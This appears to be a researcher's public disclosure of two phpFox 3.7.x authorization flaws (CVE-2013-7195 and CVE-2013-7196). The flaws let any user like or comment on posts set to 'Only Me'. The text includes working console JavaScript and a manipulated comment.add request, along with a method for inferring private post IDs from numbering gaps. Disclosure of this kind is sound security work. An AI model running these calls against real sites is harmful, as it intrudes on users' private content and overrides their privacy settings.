PHPFox vulnerbilty v3.7.3 v3.7.4 v3.7.5 all build

This document is part of the publication of a vulnerability found in phpFox late last year, the process was more time consuming that I found today “5 months”, I believe that was due to involve many module, anyway everything went well and now is public.

The problem description can be found on the websites:

[+] Links

• Bugtraq
• Packetstorm Security
• Security Focus

[+] CVE’s

• CVE-2013-7195
• CVE-2013-7196

[+] Flag as “like” a publication set to “Only Me” (v3.7.3 and v3.7.4)

Analyzing how the “comment” and “like” are added to a publication, it was possible to manipulate them so that a publication set to “ONLY ME” can receive an external comment or mark this as “like”, not even having any relationship with the user. The private publications “Only me” can easily be discovered by analyzing the source of the page, since all receive a unique identifier, to know these identifiers in the source one can easily identify the holes in the sequence.

$Core.Like.Actions.doLike(0, ‘user_status’, 26, 0, this);

$Core.Like.Actions.doLike(0, ‘user_status’, 28, 0, this);

$Core.Like.Actions.doLike(0, ‘user_status’, 30, 0, this);

$Core.Like.Actions.doLike(0, ‘user_status’, 33, 0, this);

Unique ID Possible Privacy
26————> public
27————> removed or private
28————> public
29————> removed or private
30————> public
31————> removed or private
32————> removed or private
33————> public

this logic can be applied to other types of publications such as videos, links and so on.

to exemplify, we will asume that the post with ID 27 is private “ONLY ME”, and to mark the publication with ID 27 as “like”, just use the code below in your browser console:

javascript console:

$Core.Like.Actions.doLike(0, ‘user_status’, 27, 0, this);

the account will be notified and will appear in the same publication that was marked as “like” of the user who ran the code above.

The above problem can be found in version v3.7.3 and v3.7.4 all build.

[+] Comment on a publication set to “Only Me” (v3.7.3, v3.7.4 and v3.7.5)

Following the logic above, we can identify possible private publications. We’ll get the ID 27 and add a comment, remembering that it is private “Only me”.

These are variables of a comment.

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7 &val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0& val[default_feed_value]=Write%20a%20comment…&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Variables that can be manipulated.

val[text] ——-> Text of comment
val[type] ——-> user_status, photo, music_song, poll, link, blog
val[item_id] ——-> Unique ID

to make the process more dynamic the script below was created.

[+] Visit GitHub for more details ‘script’

GitHub

this information can also be manipulated directly in the console.

The above problem can be found in version v3.7.3, v3.7.4 and v3.7.5 all build.